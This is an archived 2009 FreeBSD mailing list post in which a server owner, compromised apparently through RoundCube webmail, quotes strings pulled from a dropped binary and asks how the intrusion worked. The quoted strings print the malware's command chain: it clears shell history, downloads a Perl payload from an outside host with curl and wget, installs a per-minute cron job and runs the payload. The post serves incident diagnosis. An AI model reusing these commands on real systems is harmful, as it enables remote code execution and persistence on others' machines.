From owner-freebsd-questions@FreeBSD.ORG Thu Aug 27 09:52:03 2009 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A2C23106568B for ; Thu, 27 Aug 2009 09:52:03 +0000 (UTC) (envelope-from bounces@nabble.com) Received: from kuber.nabble.com (kuber.nabble.com [216.139.236.158]) by mx1.freebsd.org (Postfix) with ESMTP id 7551B8FC35 for ; Thu, 27 Aug 2009 09:52:03 +0000 (UTC) Received: from isper.nabble.com ([192.168.236.156]) by kuber.nabble.com with esmtp (Exim 4.63) (envelope-from ) id 1MgbeE-0007mm-Qd for freebsd-questions@freebsd.org; Thu, 27 Aug 2009 02:52:02 -0700 Message-ID: <25167487.post@talk.nabble.com> Date: Thu, 27 Aug 2009 02:52:02 -0700 (PDT) From: Colin Brace To: freebsd-questions@freebsd.org In-Reply-To: <25149559.post@talk.nabble.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Nabble-From: cb@lim.nl References: <4A924601.3000507@lim.nl> <200908240807.n7O87o3U092052@banyan.cs.ait.ac.th> <200908241026.55693.j.mckeown@ru.ac.za> <25130058.post@talk.nabble.com> <20090825091937.GA53416@cheddar.urgle.com> <25131646.post@talk.nabble.com> <200908251027.n7PARZBt009994@banyan.cs.ait.ac.th> <25132123.post@talk.nabble.com> <20090825082604.41cad357.wmoran@potentialtech.com> <25134056.post@talk.nabble.com> <20090825134250.GA6871@ei.bzerk.org> <25135959.post@talk.nabble.com> <4A943A9B.1030703@cyberleo.net> <25143778.post@talk.nabble.com> <25149271.post@talk.nabble.com> <25149559.post@talk.nabble.com> Subject: Re: what www perl script is running? X-BeenThere: freebsd-questions@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: User questions List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Thu, 27 Aug 2009 09:52:03 -0000 Colin Brace wrote: > > ahhhhh, another directory found in /tmp with files written by www called > .bash/ Contents here: > > http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz > Apropos of the contents of the above, a correspondent writes: [...] running 'strings' on /tmp/owned will show "HISTFILE=/dev/null cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null echo '*/1 * * * * perl /tmp/tmpfile' >cron.job crontab cron.job rm -rf cron.job chmod 0100 /tmp/tmpfile 2>&1 >/dev/null perl /tmp/tmpfile 2>&1 >/dev/null" [...] So this would be the original mischief-maker. Just out of curiousity, can someone explain to me in basic terms how an intruder exploits a vulnerability such as apparently existed on my system (the RoundCube webmail package was apparently the culprit) to place the binary file "owned" in /tmp and execute it? Thanks ----- Colin Brace Amsterdam http://lim.nl -- View this message in context: http://www.nabble.com/what-www-perl-script-is-running--tp25112050p25167487.html Sent from the freebsd-questions mailing list archive at Nabble.com.